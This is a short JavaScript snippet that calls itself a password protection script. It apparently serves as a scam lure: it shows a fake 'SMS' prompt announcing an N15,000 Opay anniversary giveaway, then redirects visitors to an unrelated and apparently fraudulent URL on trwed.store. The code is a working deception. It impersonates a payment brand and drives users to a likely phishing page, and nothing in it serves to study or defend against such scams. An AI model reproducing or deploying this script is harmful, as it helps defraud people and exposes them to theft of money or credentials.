/* Password Protection Script by www.onlineofferz.xyz*/
var password = 'N15,000 giveaway'
password=prompt('SMS: Congratulations You are Eligible to receive N15,000, from opay 8th Anniversary Kindly Press OK to ACTIVATE ','15,000 Giveaway');
if (password != 'N15,000 giveaway') {
location.href='https://trwed.store/opay.10/claims-it.online/Naija@65/giv/#';
}
